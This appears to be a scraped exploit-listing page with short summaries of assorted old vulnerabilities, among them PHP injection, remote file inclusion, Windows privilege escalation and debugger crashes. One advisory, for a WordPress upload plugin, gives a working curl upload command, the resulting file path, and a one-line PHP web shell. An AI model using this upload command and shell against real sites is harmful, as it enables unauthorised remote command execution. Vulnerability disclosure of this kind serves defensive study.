ShoutPro 1.5.2 fails to fully sanitize user input ($shout) that it writes to the shouts.php file when adding a new message, this can result in the injection and execution of arbitrary PHP code.
This exploit takes advantage of a local format string vulnerability in OllyDbg v110. It allows an attacker to execute arbitrary code by invoking calc.exe. The shellcode is XORed with 0x02 and is limited to a maximum size of 256 bytes. The exploit was discovered by Ned from felinemenace.org.
The Cabron Connector v1.1.0 is vulnerable to remote file inclusion. The vulnerability can be exploited by providing a malicious input in the 'CabronServiceFolder' parameter in the 'inclusionService.php' file. This allows an attacker to include arbitrary files from remote servers.
This exploit allows an attacker to elevate their privileges on a local system. The exploit takes advantage of a vulnerability in the GDI (Graphics Device Interface) component of Windows. By executing code with kernel privilege, the attacker can gain control over the system. The exploit was developed using Dev-C++ 4.9.9.2 and linked with /lib/libgdi32.a. For more information, refer to the references provided.
This exploit allows an attacker to execute arbitrary code on a target system running MiniGal b13. The exploit creates a backdoor on the target system, which can be accessed through a specific URL.
The ISC DHCP software is prone to multiple denial-of-service vulnerabilities. An attacker can exploit these issues to cause the affected application to crash, resulting in a denial-of-service condition.
The vulnerability exists in Immunity Debugger v1.85. It is caused by incorrect path/file extension parsing. By creating a folder with the name .exe.exe and placing any program inside, or by trying to debug an executable with the name test.exe.exe or lib.exe.dll, it is possible to trigger a crash. This is due to the 'OpenEXEfile' function not checking if the return value of strchr() is zero.
This vulnerability allows remote attackers to include arbitrary files via a specially crafted URL.
+---------------------------------------------------------------------------+#[+] Author: TUNISIAN CYBER#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability#[+] Date: 3-07-2015#[+] Type: WebAPP#[+] Download Plugin: https://downloads.wordpress.org/plugin/acf-frontend-display.2.0.5.zip#[+] Tested on: KaliLinux#[+] Friendly Sites: sec4ever.com#[+] Twitter: @TCYB3R+---------------------------------------------------------------------------+curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"File Path: site/wp-content/uploads/uigen_YEAR/file.phpExample: site/wp-content/uploads/uigen_2015/evil.phpevil.php: <?php passthru($_GET['cmd']); ?>TUNISIAN CYBER(miutex)-S4E
This exploit targets a race condition vulnerability in proc_kmem_dump.c. By leveraging the race condition, an attacker can gain unauthorized access to memory locations and potentially execute arbitrary code.
Services By CQR